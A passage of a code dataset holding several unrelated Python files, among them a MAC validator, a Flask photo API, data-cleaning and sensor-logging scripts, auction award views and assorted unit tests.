re.compile(r'^([0-9a-f]{2}:){5}[0-9a-f]{2}$')\n\ndef validate_mac(mac):\n if mac == '00:00:00:00:00:00':\n raise ValidationError('Invalid MAC address—to disable DHCP for this '\n 'interface, uncheck \"Enable DHCP\"')\n elif not mac_pattern.match(mac):\n raise ValidationError('Invalid MAC address')\n","sub_path":"cyder/cydhcp/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"136673715","text":"\"\"\"\nThis is the Live Photos module supporting all the ReST actions\n\"\"\"\n\n# App modules\nfrom utils import *\n\n# 3rd party modules\nfrom flask import make_response, abort\n\n# Data to serve with our API\nLIVE_PHOTOS = {\n \"Storage::Photos::Asset::OXZsVTFlaEhSNjBFc1doaWVxM0xGdz09\": {\n\t\t\"Identifier\": \"Storage::Photos::Asset::OXZsVTFlaEhSNjBFc1doaWVxM0xGdz09\",\n\t\t\"IsLivePhoto\": True,\n\t\t\"Mime\": \"image/jpeg\",\n\t\t\"Timestamp\": \"2017-05-26T14:16:51\",\n\t\t\"TimestampKind\": \"Utc\"\n },\n \"Storage::Photos::Asset::NUd0V2llYVpiekpTK0lOOUF2YndYZz09\": {\n\t\t\"Identifier\": \"Storage::Photos::Asset::NUd0V2llYVpiekpTK0lOOUF2YndYZz09\",\n\t\t\"IsLivePhoto\": True,\n\t\t\"Mime\": \"image/jpeg\",\n\t\t\"Timestamp\": \"2017-05-26T14:15:11\",\n\t\t\"TimestampKind\": \"Utc\"\n },\n \"Storage::Photos::Asset::ZWhOdEVOWEgxaWJJU2JLRzhHSW1Qdz09\": {\n\t\t\"Identifier\": \"Storage::Photos::Asset::ZWhOdEVOWEgxaWJJU2JLRzhHSW1Qdz09\",\n\t\t\"IsLivePhoto\": True,\n\t\t\"Mime\": \"image/jpeg\",\n\t\t\"Timestamp\": \"2017-04-07T14:57:34\",\n\t\t\"TimestampKind\": \"Utc\"\n },\n}\n\ndef upload_photo(upfile):\n\t# Calculate MD5 hash of the uploaded file before it is saved!\n\thash_value = calculate_file_hash(upfile)\n\tidentifier = make_asset_identifier(hash_value)\n\treturn \"File: %s, Asset identifier: %s\" % (upfile.filename, identifier)\n\ndef read_all():\n \"\"\"\n This function responds to a request for /photos/live\n with the complete lists of Live Photos\n\n :return: json string of Live Photos\n \"\"\"\n return list(LIVE_PHOTOS.values())\n\n\n# def read_one(lname):\n# \"\"\"\n# This function responds to a request for /api/people/{lname}\n# with one matching person from people\n# \n# :param lname: last name of person to find\n# :return: person matching last name\n# \"\"\"\n# # Does the person exist in people?\n# if lname in PEOPLE:\n# person = PEOPLE.get(lname)\n# \n# # otherwise, nope, not found\n# else:\n# abort(\n# 404, \"Person with last name {lname} not found\".format(lname=lname)\n# )\n# \n# return person\n# \n# \n# def create(person):\n# \"\"\"\n# This function creates a new person in the people structure\n# based on the passed in person data\n# \n# :param person: person to create in people structure\n# :return: 201 on success, 406 on person exists\n# \"\"\"\n# lname = person.get(\"lname\", None)\n# fname = person.get(\"fname\", None)\n# \n# # Does the person exist already?\n# if lname not in PEOPLE and lname is not None:\n# PEOPLE[lname] = {\n# \"lname\": lname,\n# \"fname\": fname,\n# \"timestamp\": get_timestamp(),\n# }\n# return make_response(\n# \"{lname} successfully created\".format(lname=lname), 201\n# )\n# \n# # Otherwise, they exist, that's an error\n# else:\n# abort(\n# 406,\n# \"Peron with last name {lname} already exists\".format(lname=lname),\n# )\n# \n# \n# def update(lname, person):\n# \"\"\"\n# This function updates an existing person in the people structure\n# \n# :param lname: last name of person to update in the people structure\n# :param person: person to update\n# :return: updated person structure\n# \"\"\"\n# # Does the person exist in people?\n# if lname in PEOPLE:\n# PEOPLE[lname][\"fname\"] = person.get(\"fname\")\n# PEOPLE[lname][\"timestamp\"] = get_timestamp()\n# \n# return PEOPLE[lname]\n# \n# # otherwise, nope, that's an error\n# else:\n# abort(\n# 404, \"Person with last name {lname} not found\".format(lname=lname)\n# )\n# \n# \n# def delete(lname):\n# \"\"\"\n# This function deletes a person from the people structure\n# \n# :param lname: last name of person to delete\n# :return: 200 on successful delete, 404 if not found\n# \"\"\"\n# # Does the person to delete exist?\n# if lname in PEOPLE:\n# del PEOPLE[lname]\n# return make_response(\n# \"{lname} successfully deleted\".format(lname=lname), 200\n# )\n# \n# # Otherwise, nope, person to delete not found\n# else:\n# abort(\n# 404, \"Person with last name {lname} not found\".format(lname=lname)\n# )\n","sub_path":"live.py","file_name":"live.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"475549905","text":"import sys\nimport pandas as pd\nimport numpy as np\nfrom sqlalchemy import create_engine\n\ndef load_data(messages_filepath, categories_filepath):\n ''' load and merge two datasets.\n Args:\n messages_filepath: string; filepath for csv file containing messages dataset.\n categories_filepath: string; filepath for csv file containing categories dataset.\n \n Returns:\n df: dataframe; a merged dataframe containing messages and categories datasets.\n '''\n\n # Load messages and categories datasets\n messages = pd.read_csv(messages_filepath) # 'messages.csv'\n categories = pd.read_csv(categories_filepath) # 'categories.csv'\n\n # Merge two datasets\n df = messages.merge(categories, on = 'id', how = 'inner')\n\n return df\n\n\ndef clean_data(df):\n ''' clean dataframe by \n - converting categories from string to numeric values;\n - removing columns with unique value or removing records with non-binary values; and\n - removing duplicated records\n\n Args:\n df: dataframe; a merged dataframe from load_data() \n \n Returns:\n df: dataframe; a cleaned dataframe containing messages and categories information.\n '''\n # Create a dataframe of the 36 individual category columns \n categories = df.categories.str.split(pat = ';', expand = True)\n\n # Select the first row of the categories dataframe\n # and use this row to extract a list of new column names for categories.\n row = categories.iloc[0, :]\n category_colnames = row.apply(lambda x: x[:-2]).tolist()\n categories.columns = category_colnames\n\n # Convert string values to a numeric value\n for column in categories:\n # replace original value to be the last character of the string\n categories[column] = categories[column].apply(lambda x: x[-1:])\n # convert dtype from string to numeric\n categories[column] = pd.to_numeric(categories[column])\n\n # Replace the original caategories column with the new categories dataframe\n df = pd.concat([df.drop('categories', axis = 1), categories], axis = 1)\n\n # Remove duplicates \n df.drop_duplicates(inplace = True)\n\n # Drop columns if the column has only one (unique) value\n # and drop records if any of the column has non-binary values (vales other than 0 or 1)\n for col in df.columns[4:]: \n # display(col)\n if len(pd.unique(df[col])) == 1:\n df.drop(col, axis = 1, inplace = True)\n print(' {} column with a unigue value is dropped'.format(col))\n continue\n \n if len(pd.unique(df[col])) != 2:\n target = pd.unique(df[col])[-1]\n df = df.loc[df[col] != target, :]\n print(' Records with value {} in the {} column are dropped'.format(target, col))\n\n\n return df\n\n\ndef save_data(df, database_filename):\n\n engine = create_engine('sqlite:///' + database_filename)\n df.to_sql('msg_categories', engine, index = False, if_exists = 'replace')\n pass \n\n\ndef main():\n if len(sys.argv) == 4:\n\n messages_filepath, categories_filepath, database_filepath = sys.argv[1:]\n\n print('Loading data...\\n MESSAGES: {}\\n CATEGORIES: {}'\n .format(messages_filepath, categories_filepath))\n df = load_data(messages_filepath, categories_filepath)\n\n print('Cleaning data...')\n df = clean_data(df)\n \n print('Saving data...\\n DATABASE: {}'.format(database_filepath))\n save_data(df, database_filepath)\n \n print('Cleaned data saved to database!')\n \n else:\n print('Please provide the filepaths of the messages and categories '\\\n 'datasets as the first and second argument respectively, as '\\\n 'well as the filepath of the database to save the cleaned data '\\\n 'to as the third argument. \\n\\nExample: python process_data.py '\\\n 'disaster_messages.csv disaster_categories.csv '\\\n 'DisasterResponse.db')\n\n\nif __name__ == '__main__':\n main()","sub_path":"Part 9. Data Engineering/Project: Disaster Response Pipelines/data/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":3999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"375444243","text":"#######\nimport numpy as np\nimport SLSim as sl\nfrom scipy import io as sio\n\nstride = 1 # \nmy_sim = sl.mockSimulation()\nmy_sim.tp = sio.mmread('tProb.mtx')\nmy_sim.x = np.load('Gens_aloopRMSD.npy')\nmy_sim.y = np.load('Gens_y_KE.npy')\nmy_sim.mapping = np.load('map_Macro2micro.npy')\n\nfor i in range(100):\n\ttry:\n\t\txedges = np.linspace(0, 1, num=41)\n\t\tyedges = np.linspace(0, 2, num=41)\n\n\t\ttrjs = np.load('trjs_theta'+str(i)+'.npy')\n\t\t#trj_x, trj_y = my_sim.map(trjs)\n\t\n\t\tphi_all = trjs[0]\n\t\tpsi_all = trjs[1]\n\t\tphi = []\n\t\tpsi = []\n\t\tdata = []\n\t\tfor frame in range(len(phi_all)):\n\t\t phi.append(phi_all[frame])\n\t\t psi.append(psi_all[frame])\n\t\t H, xedges, yedges = np.histogram2d(phi, psi, bins=(xedges, yedges))\n\t\t H0 = np.nonzero(np.concatenate(H))\n\t\t n_states = len(H0[0])\n\t\t data.append([frame, n_states])\n\t\tnp.save('n_discoveredS_time'+str(i)+'.npy', data)\n\texcept:\n\t\tprint(i)\n\t\t\n\n\n\n","sub_path":"MDSimulation/Src/nBins/RL/timeVsBins-1.py","file_name":"timeVsBins-1.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"473716290","text":"#!/usr/bin/python\nfrom Adafruit_BME280 import *\nfrom math import log\nimport datetime as dt\nimport re\n\nsensor = BME280(t_mode=BME280_OSAMPLE_8, p_mode=BME280_OSAMPLE_8, h_mode=BME280_OSAMPLE_8)\n\n# Pressure logging\ndegrees = sensor.read_temperature()\npascals = sensor.read_pressure()\nhectopascals = pascals / 100\n\nwith open(\"/home/pi/balloonS/sensor_logs/press_log\", mode = \"a+\") as press_log:\t\n\ttime_stamp = dt.datetime.now().strftime('[%Y-%m-%d %H:%M:%S]')\n\tpress_log.write(time_stamp + \" p=\" + str(hectopascals) + \"hPa\\n\")\n\n# Altitude logging\nPRESS0 = 1013.25\t# Pressure at sea level (hPa)\nu = 0.0289644\t\t# Molar mas of air\ng = 9.8101\t\t\t# Standard acceleration\nR = 8.314458948\t\t# Universal gas constant\n\nwith open(\"/home/pi/balloonS/sensor_logs/temp_log\", mode = \"r\") as temp_log:\n\ttemp_log.seek(2)\n\tline = temp_log.readline()\n\ttemp = re.search(r'(?<=t=)[0-9]*', line).group()\n\t\n# Calculate altitude\nalt = - (R * (float(temp) + 273) * log(hectopascals / PRESS0) / (u * g))\n\nwith open(\"/home/pi/balloonS/sensor_logs/alt_log\", mode = \"a+\") as alt_log:\t\n\ttime_stamp = dt.datetime.now().strftime('[%Y-%m-%d %H:%M:%S]')\n\talt_log.write(time_stamp + \" a=\" + str(alt) + \"m\\n\")","sub_path":"press_alt_logger.py","file_name":"press_alt_logger.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"432175320","text":"from recursion.Swap_Nodes_in_Pairs.main import Solution, ListNode\n\n\ndef test_swapPairs():\n head = ListNode(1)\n head.next = ListNode(2)\n head.next.next = ListNode(3)\n head.next.next.next = ListNode(4)\n\n expected = ListNode(2)\n expected.next = ListNode(1)\n expected.next.next = ListNode(4)\n expected.next.next.next = ListNode(3)\n\n solution = Solution()\n solution.swapPairs(head)\n while expected:\n print(\"hey\", head.val, expected.val)\n assert head.val == expected.val\n head = head.next\n expected = expected.next\n","sub_path":"recursion/Swap_Nodes_in_Pairs/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"71630274","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nfrom oauth2client.file import Storage\nfrom oauth2client.client import flow_from_clientsecrets\nfrom apiclient.discovery import build\n\nimport httplib2\nimport pprint\n\nimport logging \nlogging.basicConfig()\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nBASE_INFO = {\n \"app\":\"gdcmdtools\",\n \"description\":'Google Drive command line tools',\n \"version\":'0.97'}\n\nGDAPI_VER = 'v2'\nFTAPI_VER = 'v1'\nDISCOVERY_URL = \"https://www.googleapis.com/discovery/v1/apis/{api}/{apiVersion}/rest\"\n\nDEBUG_LEVEL = ('debug', 'info', 'warning', 'error', 'critical')\n\nclass GDBase(object):\n def __init__(self):\n self.drive_service = None\n self.ft_service = None\n self.http = None\n self.root_folder = None\n\n def get_root(self):\n if self.root_folder == None:\n if self.drive_service == None:\n self.get_drive_service()\n about = self.drive_service.about().get().execute()\n \n self.root_folder = about['rootFolderId']\n logger.debug(\"root_folder=%s\" % self.root_folder)\n return self.root_folder\n\n def get_drive_service(self, http):\n self.drive_service = build('drive', GDAPI_VER, \n discoveryServiceUrl=DISCOVERY_URL, http=http)\n\n return self.drive_service\n\n def get_ft_service(self, http):\n self.ft_service = build('fusiontables', FTAPI_VER, \n discoveryServiceUrl=DISCOVERY_URL, http=http)\n\n return self.ft_service\n\n\n","sub_path":"gdcmdtools/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"94607527","text":"# -*- coding: utf-8 -*-\nfrom openprocurement.api.utils import (\n json_view,\n context_unpack,\n APIResource,\n get_now,\n)\nfrom openprocurement.auctions.core.utils import (\n apply_patch,\n save_auction,\n opresource,\n)\nfrom openprocurement.auctions.core.validation import (\n validate_award_data,\n validate_patch_award_data,\n validate_award_data_post_common,\n validate_patch_award_data_patch_common,\n)\nfrom openprocurement.auctions.core.plugins.awarding.base.utils import (\n check_auction_protocol\n)\n\n\n@opresource(\n name='awarding_3_0:Auction Awards',\n collection_path='/auctions/{auction_id}/awards',\n path='/auctions/{auction_id}/awards/{award_id}',\n awardingType='awarding_3_0',\n description=\"Auction awards\"\n)\nclass AuctionAwardResource(APIResource):\n\n @json_view(permission='view_auction')\n def collection_get(self):\n \"\"\"Auction Awards List\n\n Get Awards List\n ---------------\n\n Example request to get awards list:\n\n .. sourcecode:: http\n\n GET /auctions/4879d3f8ee2443169b5fbbc9f89fa607/awards HTTP/1.1\n Host: example.com\n Accept: application/json\n\n This is what one should expect in response:\n\n .. sourcecode:: http\n\n HTTP/1.1 200 OK\n Content-Type: application/json\n\n {\n \"data\": [\n {\n \"status\": \"active\",\n \"suppliers\": [\n {\n \"id\": {\n \"name\": \"Державне управління справами\",\n \"scheme\": \"https://ns.openprocurement.org/ua/edrpou\",\n \"uid\": \"00037256\",\n \"uri\": \"http://www.dus.gov.ua/\"\n },\n \"address\": {\n \"countryName\": \"Україна\",\n \"postalCode\": \"01220\",\n \"region\": \"м. Київ\",\n \"locality\": \"м. Київ\",\n \"streetAddress\": \"вул. Банкова, 11, корпус 1\"\n }\n }\n ],\n \"value\": {\n \"amount\": 489,\n \"currency\": \"UAH\",\n \"valueAddedTaxIncluded\": true\n }\n }\n ]\n }\n\n \"\"\"\n return {'data': [i.serialize(\"view\") for i in self.request.validated['auction'].awards]}\n\n @json_view(content_type=\"application/json\", permission='create_award',\n validators=(validate_award_data, validate_award_data_post_common))\n def collection_post(self):\n \"\"\"Accept or reject bidder application\n\n Creating new Award\n ------------------\n\n Example request to create award:\n\n .. sourcecode:: http\n\n POST /auctions/4879d3f8ee2443169b5fbbc9f89fa607/awards HTTP/1.1\n Host: example.com\n Accept: application/json\n\n {\n \"data\": {\n \"status\": \"active\",\n \"suppliers\": [\n {\n \"id\": {\n \"name\": \"Державне управління справами\",\n \"scheme\": \"https://ns.openprocurement.org/ua/edrpou\",\n \"uid\": \"00037256\",\n \"uri\": \"http://www.dus.gov.ua/\"\n },\n \"address\": {\n \"countryName\": \"Україна\",\n \"postalCode\": \"01220\",\n \"region\": \"м. Київ\",\n \"locality\": \"м. Київ\",\n \"streetAddress\": \"вул. Банкова, 11, корпус 1\"\n }\n }\n ],\n \"value\": {\n \"amount\": 489,\n \"currency\": \"UAH\",\n \"valueAddedTaxIncluded\": true\n }\n }\n }\n\n This is what one should expect in response:\n\n .. sourcecode:: http\n\n HTTP/1.1 201 Created\n Content-Type: application/json\n\n {\n \"data\": {\n \"id\": \"4879d3f8ee2443169b5fbbc9f89fa607\",\n \"date\": \"2014-10-28T11:44:17.947Z\",\n \"status\": \"active\",\n \"suppliers\": [\n {\n \"id\": {\n \"name\": \"Державне управління справами\",\n \"scheme\": \"https://ns.openprocurement.org/ua/edrpou\",\n \"uid\": \"00037256\",\n \"uri\": \"http://www.dus.gov.ua/\"\n },\n \"address\": {\n \"countryName\": \"Україна\",\n \"postalCode\": \"01220\",\n \"region\": \"м. Київ\",\n \"locality\": \"м. Київ\",\n \"streetAddress\": \"вул. Банкова, 11, корпус 1\"\n }\n }\n ],\n \"value\": {\n \"amount\": 489,\n \"currency\": \"UAH\",\n \"valueAddedTaxIncluded\": true\n }\n }\n }\n\n \"\"\"\n award = self.request.validated['award']\n period = {'startDate': get_now()}\n award.complaintPeriod = award.signingPeriod = period\n award.verificationPeriod = period\n self.request.validated['auction'].awards.append(award)\n if save_auction(self.request):\n self.LOGGER.info('Created auction award {}'.format(award.id),\n extra=context_unpack(self.request,\n {'MESSAGE_ID': 'auction_award_create'},\n {'award_id': award.id}))\n self.request.response.status = 201\n route = self.request.matched_route.name.replace(\"collection_\", \"\")\n headers_locations = self.request.current_route_url(_route_name=route,\n award_id=award.id,\n _query={})\n self.request.response.headers['Location'] = headers_locations\n return {'data': award.serialize(\"view\")}\n\n @json_view(permission='view_auction')\n def get(self):\n \"\"\"Retrieving the award\n\n Example request for retrieving the award:\n\n .. sourcecode:: http\n\n GET /auctions/4879d3f8ee2443169b5fbbc9f89fa607/awards/71b6c23ed8944d688e92a31ec8c3f61a HTTP/1.1\n Host: example.com\n Accept: application/json\n\n And here is the response to be expected:\n\n .. sourcecode:: http\n\n HTTP/1.0 200 OK\n Content-Type: application/json\n\n {\n \"data\": {\n \"id\": \"4879d3f8ee2443169b5fbbc9f89fa607\",\n \"date\": \"2014-10-28T11:44:17.947Z\",\n \"status\": \"active\",\n \"suppliers\": [\n {\n \"id\": {\n \"name\": \"Державне управління справами\",\n \"scheme\": \"https://ns.openprocurement.org/ua/edrpou\",\n \"uid\": \"00037256\",\n \"uri\": \"http://www.dus.gov.ua/\"\n },\n \"address\": {\n \"countryName\": \"Україна\",\n \"postalCode\": \"01220\",\n \"region\": \"м. Київ\",\n \"locality\": \"м. Київ\",\n \"streetAddress\": \"вул. Банкова, 11, корпус 1\"\n }\n }\n ],\n \"value\": {\n \"amount\": 489,\n \"currency\": \"UAH\",\n \"valueAddedTaxIncluded\": true\n }\n }\n }\n\n \"\"\"\n return {'data': self.request.validated['award'].serialize(\"view\")}\n\n @json_view(content_type=\"application/json\", permission='edit_auction_award',\n validators=(validate_patch_award_data, validate_patch_award_data_patch_common))\n def patch(self):\n \"\"\"Update of award\n\n Example request to change the award:\n\n .. sourcecode:: http\n\n PATCH /auctions/4879d3f8ee2443169b5fbbc9f89fa607/awards/71b6c23ed8944d688e92a31ec8c3f61a HTTP/1.1\n Host: example.com\n Accept: application/json\n\n {\n \"data\": {\n \"value\": {\n \"amount\": 600\n }\n }\n }\n\n And here is the response to be expected:\n\n .. sourcecode:: http\n\n HTTP/1.0 200 OK\n Content-Type: application/json\n\n {\n \"data\": {\n \"id\": \"4879d3f8ee2443169b5fbbc9f89fa607\",\n \"date\": \"2014-10-28T11:44:17.947Z\",\n \"status\": \"active\",\n \"suppliers\": [\n {\n \"id\": {\n \"name\": \"Державне управління справами\",\n \"scheme\": \"https://ns.openprocurement.org/ua/edrpou\",\n \"uid\": \"00037256\",\n \"uri\": \"http://www.dus.gov.ua/\"\n },\n \"address\": {\n \"countryName\": \"Україна\",\n \"postalCode\": \"01220\",\n \"region\": \"м. Київ\",\n \"locality\": \"м. Київ\",\n \"streetAddress\": \"вул. Банкова, 11, корпус 1\"\n }\n }\n ],\n \"value\": {\n \"amount\": 600,\n \"currency\": \"UAH\",\n \"valueAddedTaxIncluded\": true\n }\n }\n }\n\n \"\"\"\n auction = self.request.validated['auction']\n award = self.request.context\n current_award_status = award.status\n now = get_now()\n if current_award_status in ['unsuccessful', 'cancelled']:\n self.request.errors.add(\n 'body',\n 'data',\n 'Can\\'t update award in current ({}) status' .format(current_award_status)\n )\n self.request.errors.status = 403\n return\n\n apply_patch(self.request, save=False, src=self.request.context.serialize())\n new_award_status = award.status\n\n if current_award_status == 'pending.waiting' and new_award_status == 'cancelled':\n if self.request.authenticated_role == 'bid_owner':\n award.complaintPeriod.endDate = now\n else:\n self.request.errors.add(\n 'body',\n 'data',\n 'Only bid owner may cancel award in current ({}) status'.format(current_award_status)\n )\n self.request.errors.status = 403\n return\n\n elif current_award_status == 'pending' and new_award_status == 'active':\n if check_auction_protocol(award):\n award.verificationPeriod.endDate = now\n else:\n self.request.errors.add(\n 'body',\n 'data',\n 'Can\\'t switch award status to (active) before'\n ' auction owner load auction protocol'\n )\n self.request.errors.status = 403\n return\n\n award.complaintPeriod.endDate = now\n auction.contracts.append(type(auction).contracts.model_class({\n 'awardID': award.id,\n 'suppliers': award.suppliers,\n 'value': award.value,\n 'date': get_now(),\n 'items': auction.items,\n 'contractID': '{}-{}{}'.format(\n auction.auctionID,\n self.server_id,\n len(auction.contracts) + 1\n ),\n 'signingPeriod': award.signingPeriod,\n }))\n auction.status = 'active.awarded'\n auction.awardPeriod.endDate = now\n elif current_award_status != 'pending.waiting' and new_award_status == 'unsuccessful':\n if current_award_status == 'pending':\n award.verificationPeriod.endDate = now\n elif current_award_status == 'active':\n contract = None\n for contract in auction.contracts:\n if contract.awardID == award.id:\n break\n if getattr(contract, 'dateSigned', False):\n err_message = 'You cannot disqualify the bidder the contract for whom has already been downloaded.'\n self.request.errors.add('body', 'data', err_message)\n self.request.errors.status = 403\n return\n award.signingPeriod.endDate = now\n auction.awardPeriod.endDate = None\n auction.status = 'active.qualification'\n for i in auction.contracts:\n if i.awardID == award.id:\n i.status = 'cancelled'\n award.complaintPeriod.endDate = now\n self.request.content_configurator.back_to_awarding()\n elif current_award_status != new_award_status:\n self.request.errors.add(\n 'body',\n 'data',\n 'Can\\'t switch award ({0}) status to ({1}) status'.format(\n current_award_status,\n new_award_status\n )\n )\n self.request.errors.status = 403\n return\n\n if save_auction(self.request):\n self.LOGGER.info(\n 'Updated auction award {}'.format(self.request.context.id),\n extra=context_unpack(\n self.request,\n {'MESSAGE_ID': 'auction_award_patch'}\n )\n )\n return {'data': award.serialize(\"view\")}\n","sub_path":"openprocurement/auctions/core/plugins/awarding/v3/views/award.py","file_name":"award.py","file_ext":"py","file_size_in_byte":15199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"224677729","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nscraper_tests.test_main - tests for MetaFilter interaction\n\n\"\"\"\n\nfrom __future__ import absolute_import, unicode_literals\n\nimport datetime\nimport unittest\n\nfrom scraper.__main__ import get_url_details, process_metafilter_urls\nfrom scraper.utils import datetime_to_utc_timestamp\n\n\nclass TestMain(unittest.TestCase):\n \"\"\"\n Test case for the \"main\" module.\n\n \"\"\"\n def test_url_reddit_wins(self):\n \"\"\"Tests the URL details method when Reddit wins\"\"\"\n url = \"https://www.theguardian.com/lifeandstyle/2016/aug/31/new-york\" \\\n \"-city-subway-trains-noise-pollution-jet-engine\"\n metafilter_time = datetime_to_utc_timestamp(datetime.datetime(\n 2016, 9, 1, 3, 39, 0), \"UTC\")\n expected_reddit_time = datetime_to_utc_timestamp(datetime.datetime(\n 2016, 9, 1, 1, 27, 21), \"UTC\")\n\n details = get_url_details(url, metafilter_time)\n\n self.assertEqual(details['winner'], 'reddit')\n self.assertEqual(details['reddit_time'], expected_reddit_time)\n\n def test_url_metafilter_wins(self):\n \"\"\"Tests the URL details when MetaFilter wins\"\"\"\n url = \"https://www.theguardian.com/lifeandstyle/2016/aug/31/new-york\" \\\n \"-city-subway-trains-noise-pollution-jet-engine\"\n # moved back from actual metafilter_time for test purposes\n metafilter_time = datetime_to_utc_timestamp(datetime.datetime(\n 2016, 8, 1, 3, 39, 0), \"UTC\")\n\n details = get_url_details(url, metafilter_time)\n\n self.assertEqual(details['winner'], 'metafilter')\n\n def test_get_url_details_draw(self):\n \"\"\"Tests the URL details when the result is a draw\"\"\"\n url = \"https://www.theguardian.com/lifeandstyle/2016/aug/31/new-york\" \\\n \"-city-subway-trains-noise-pollution-jet-engine\"\n # moved back from actual metafilter_time for test purposes\n metafilter_time = datetime_to_utc_timestamp(datetime.datetime(\n 2016, 9, 1, 1, 27, 21), \"UTC\")\n\n details = get_url_details(url, metafilter_time)\n\n self.assertEqual(details['winner'], 'draw')\n\n def test_process(self):\n \"\"\"Tests the URL processing function\"\"\"\n metafilter_urls = [\n # these two are reddit winners\n {\n 'url': 'http://nymag.com/selectall/2016/08/the-secret-furry' \\\n '-patrons-keeping-indie-artists-afloat.html',\n 'datetime': 1472713080\n },\n {\n 'url': 'http://www.latimes.com/projects/la-me-framed/',\n 'datetime': 1472705520\n },\n # these two are MetaFilter winners\n {\n 'url': 'http://www.commondreams.org/news/2016/08/30/how-isds' \\\n '-playground-ultra-wealthy-corrupt-and-criminal',\n 'datetime': 1472672040\n },\n {\n 'url': 'https://vimeo.com/180668935',\n 'datetime': 1472595360\n }\n ]\n scores, _ = process_metafilter_urls(metafilter_urls)\n self.assertEqual(scores['reddit'], 2)\n self.assertEqual(scores['metafilter'], 2)\n","sub_path":"scraper_tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"92607271","text":"import io\nimport os\nimport setuptools\n\n# pip workaround\nos.chdir(os.path.abspath(os.path.dirname(__file__)))\n\nwith io.open('README.rst', encoding='utf-8') as fp:\n long_description = fp.read()\nsetuptools.setup(\n name = 'reprounzip-containerexec',\n version = '1.0',\n author = 'Dirk Beyer',\n description = \"An unpacker for reprozip using the container technology of BenchExec\",\n long_description = long_description,\n url = 'https://www.reprozip.org',\n license = 'BSD-3-Clause',\n keywords = [\n 'reprozip', 'reprounzip', 'reproducibility', 'provenance',\n 'benchexec', 'containerexec', 'container'],\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Topic :: Scientific/Engineering',\n 'Topic :: System :: Archiving'],\n platforms = ['Linux'],\n\n packages = ['reprounzip', 'reprounzip.unpackers'],\n entry_points = {\n 'reprounzip.unpackers': [\n 'containerexec = reprounzip.unpackers.containerexec:setup']\n },\n namespace_packages = ['reprounzip', 'reprounzip.unpackers'],\n install_requires = [\n 'reprounzip>=1.0.8',\n 'rpaths>=0.8',\n 'benchexec>=1.11',\n ],\n zip_safe = True,\n )\n","sub_path":"reprounzip-containerexec/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"49874423","text":"import datetime\nimport json\nimport csv\n\ndate1 = '2016-08-01'\ndate2 = '2017-07-31'\nstart = datetime.datetime.strptime(date1, '%Y-%m-%d')\nend = datetime.datetime.strptime(date2, '%Y-%m-%d')\nstep = datetime.timedelta(days=1)\ndates = [\"dato\"]\n\nwhile start <= end:\n dates.append(str(start.date()))\n start += step\n\nwith open('temp.csv', 'w') as csvFile:\n wrt = csv.writer(csvFile)\n for row in dates:\n wrt.writerow([row])\n\ncsvFile.close()\n\nwith open('temp.csv', 'r') as inp, \\\n open('datoer.json', 'w') as outp:\n reader = csv.DictReader(inp)\n out = json.dumps([row for row in reader], ensure_ascii=False, encoding=\"utf-8\", sort_keys=True,\n indent=4, separators=(',', ': '))\n outp.write(out)\n\ninp.close()\noutp.close()\n\n","sub_path":"genrateDates.py","file_name":"genrateDates.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"18860665","text":"#!/usr/bin/env python2.7\nimport subprocess\nimport sys\nimport unittest\n\n\nclass TestRNASeqPipeline(unittest.TestCase):\n\n def test_docker_call(self):\n # print sys.argv\n tool = ['quay.io/ucsc_cgl/rnaseq-cgl-pipeline:1.9.1--{}'.format(tag)]\n base = ['docker', 'run']\n args = ['--star=/foo', '--rsem=/foo', '--kallisto=/foo', '--samples=/foo']\n sock = ['-v', '/var/run/docker.sock:/var/run/docker.sock']\n mirror = ['-v', '/foo:/foo']\n sample = ['-v', '/bar:/samples']\n inputs = ['-v', '/foobar:/inputs']\n # Check base call for help menu\n out = check_docker_output(command=base + tool, assert_1=False)\n self.assertTrue('Please see the complete documentation' in out)\n self.assertFalse('foo bar' in out)\n # Check for required mirror mounts\n self.assertTrue('Wrong number of mirror mounts' in check_docker_output(base + sock + tool + args))\n # Check for mirror mount when input/sample mount is used\n self.assertTrue('Wrong number of mirror mounts' in\n check_docker_output(base + sock + sample + inputs + tool + args))\n # Check for more than one mirror mount\n self.assertTrue('Wrong number of mirror mounts' in check_docker_output(\n base + sock + mirror + ['-v', '/bar:/bar'] + tool + args))\n\n\ndef check_docker_output(command, assert_1=True):\n process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n output = process.communicate()\n if assert_1:\n assert process.returncode == 1\n else:\n assert process.returncode == 0\n return 